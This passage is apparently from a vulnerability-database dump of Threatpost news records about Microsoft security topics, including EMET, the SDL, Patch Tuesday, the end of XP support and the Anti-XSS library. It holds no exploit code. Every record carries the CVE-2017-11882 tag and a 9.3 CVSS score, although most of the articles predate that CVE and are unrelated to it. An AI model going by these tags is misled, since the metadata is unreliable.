"THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "href": "https://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:20", "description": "[](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/>)LAS VEGAS \u2014 Microsoft today released a new tool to help IT administrators backport anti-exploit mitigations like ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) to older versions of Windows.\n\nThe tool, called Enhanced Mitigation Experience Toolkit (EMET) works by applying security mitigation technologies to arbitrary applications to block against exploitation through common attack vectors.\n\nIn addition to implementing ASLR and DEP on older versions of the Windows operating system, Microsoft said EMET will also add anti-exploit mitigations to existing third-party software that do not currently opt-in to the mitigations.\n\n\u201cThis helps to protect against successful exploitation of vulnerabilities without available fixes,\u201d says Mike Reavey, a director in Microsoft\u2019s Security Response Center (MSRC). \n\nALSR and DEP, which serve as defense-in-depth roadblocks during malware attacks, are enabled by default in newer versions of Windows.\n", "cvss3": {}, "published": "2010-07-28T18:54:55", "type": "threatpost", "title": "Microsoft Ships Anti-Exploit Tool for IT Admins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:19:37", "id": "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "href": "https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. [Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "In this video, researchers Juliano Rizzo and Thai Duong demonstrate the technique they developed for stealing cryptographic keys for ASP.NET Web applications, enabling them to compromise virtually any app built on ASP.NET. \n\nYou can read the full story of their attack in this article, \u201c[Padding Oracle Attack Affects Millions of ASP.NET Apps](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>).\u201d\n", "cvss3": {}, "published": "2010-09-17T17:48:52", "type": "threatpost", "title": "Demo of ASP.NET Padding Oracle Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "href": "https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/74485/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. \u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. \u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "[](<https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/>)Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. \n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. \n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 303929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 2008 R2 boxes, is causing computers to enter into an infinite loop.\n\nA request for comment from Microsoft was not returned in time for publication. It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boot into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update notes that it supersedes another similar update from October and addressed issues that customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft, itself, formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all exponentially stronger mathematically than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains trust SHA-1 and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Staring with Chrome 40, sites with certificate chains including SHA-1 which extend beyond Jan. 1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publically disclose their researche because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that they will be shipping three critical and five important bulletins in the May edition of patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes, Microsoft Office, Windows, .NET Framework, and Silverlight. The bugs that will be fixed this month will affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May, 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:42", "description": "Microsoft has released an open-source Web Protection Library (WPL) to help developers protect web sites from cross-site scripting attacks.\n\nThe WPL, which is a set of .NET assemblies, is being offered as part of a defense in depth strategy to add an extra layer to any validation or secure coding practices.\n\nIt essentially provides a list of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript.\n\n * **White Lists:** AntiXSS differs from the standard .NET framework encoding by using a white list approach. All characters not on the white list will be encoded using the correct rules for the encoding type. Whilst this comes at a performance cost AntiXSS has been written with performance in mind.\n * **Secure Globalization:** The web is a global market place, and cross-site scripting is a global issue. An attack can be coded anywhere, and Anti-XSS now protects against XSS attacks coded in dozens of languages.\n * **Security Runtime Engine**: The Security Runtime Engine (SRE) provides a wrapper around your existing web sites, ensuring that common attack vectors to not make it to your application. Protection is provided as standard forCross Site ScriptingSQL Injection.\n\nDocumentation and download instructions [can be found at the open-source Codeplex](<http://wpl.codeplex.com/releases/view/20333>) site.\n", "cvss3": {}, "published": "2010-06-02T16:37:20", "type": "threatpost", "title": "Microsoft Releases Anti-XSS Web Protection Library", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:52", "id": "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "href": "https://threatpost.com/microsoft-releases-anti-xss-web-protection-library-060210/74047/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "[](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/>)Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) will offer governments entities at the national level with technical information on vulnerabilities that are being updated in our products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Trojan downloaders and malware that masquerades as security software are the two fastest growing threats on the Web right now, according an analysis by Microsoft\u2019s Malware Protection Center. In its latest [Software Intelligence Report](<http://www.microsoft.com/downloads/details.aspx?FamilyID=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en>), released on Wednesday, the MMPC found that a Trojan downloader named Renos that installs rogue security software was the most prevalent threat in the second half of 2008, increasing by 66 percent.\n\nTrojan downloaders in general have become a major problem as attackers continue to look for new ways to install malware on vulnerable machines. Microsoft found that these threats accounted for more than half of all of the malware removed by its Malicious Software Removal Tool from July through December of last year.\n\n\u201cThe prevalence of rogue security software has increased significantly over the past three periods. Rogue security software uses fear and annoyance tactics to convince victims to pay for \u2018full versions\u2019 of the software in order to remove and protect themselves from malware, to stop the continual alerts and warnings, or both,\u201d the report says.\n\n\n\nMicrosoft pulls the data for the SIR from the results it sees from removals of malware done by the MSRT on millions of PCs, both in the enterprise and in homes. So it\u2019s an interesting data set with a fairly broad sample base.\n\nOne other interesting nugget in the report is that only about 41 percent of browser-based exploits on pre-Vista versions of Windows targeted Microsoft products. On Vista, that number drops to about five percent. And both of those numbers have been going down over time. That\u2019s a trend that bears watching.\n\n_*Graph from Microsoft Security Intelligence Report_\n", "cvss3": {}, "published": "2009-04-08T14:14:09", "type": "threatpost", "title": "Microsoft: Rogue security software fastest-growing online threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "href": "https://threatpost.com/microsoft-rogue-security-software-fastest-growing-online-threat-040809/72530/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:03", "description": "[](<https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/>)Microsoft plans to issue seven security bulletins in the [January Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release next week, fixing six vulnerabilities rated important and one rated critical. The bugs affect a variety of products, including Windows XP, Vista, Windows 7, Server 2003 and 2008 and Microsoft Developer Tools and Software.\n\nJust three of the seven bulletins Microsoft will issue on Jan. 10 will fix a vulnerability that could lead to remote code execution. The others can either lead to elevation of privilege or information disclosure. However, there is one bulletin that Microsoft has said can also lead to \u201csecurity feature bypass,\u201d something that isn\u2019t typically seen on the company\u2019s security bulletins.\n\n\u201cIn addition, eagle-eyed readers of the summary page will notice an unusual vulnerability classification, \u2018Security Feature Bypass,\u2019 for one of our Important-severity bulletins. SFB-class issues in themselves can\u2019t be leveraged by an attacker; rather, a would-be attacker would use them to facilitate use of another exploit. For those interested in learning more, we expect the SRD blog to publish a detailed analysis of the matter on Tuesday,\u201d Microsoft\u2019s Angela Gunn wrote in a blog post.\n\nThe company will release full information on the patches and which vulnerabilities they apply to on Tuesday.\n", "cvss3": {}, "published": "2012-01-06T15:08:03", "type": "threatpost", "title": "Microsoft to Issue Seven Bulletins, One Critical, on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "href": "https://threatpost.com/microsoft-issue-seven-bulletins-one-critical-patch-tuesday-010612/76067/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to the prevailing opinion that online crime is a modern day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. \n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the amount by which cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly 